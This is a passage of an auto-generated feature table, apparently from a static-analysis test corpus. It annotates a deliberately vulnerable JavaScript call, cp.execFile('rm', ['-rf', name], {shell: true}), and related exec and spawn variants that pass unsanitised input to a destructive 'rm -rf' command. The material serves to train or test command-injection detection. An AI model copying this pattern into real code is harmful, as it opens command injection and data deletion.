autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:14:417:17 | "rm" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:20:417:32 | ["-rf", name] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:21:417:25 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:28:417:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:35:417:47 | {shell: true} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:40 | shell | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:40 | shell | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:40 | shell | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:40 | shell | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:40 | shell | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:36:417:46 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | InputAccessPathFromCallee | 2.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:43:417:46 | true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | 'arguments' object of anonymous function | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | InputArgumentIndex | 3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:50:417:65 | (err, out) => {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, 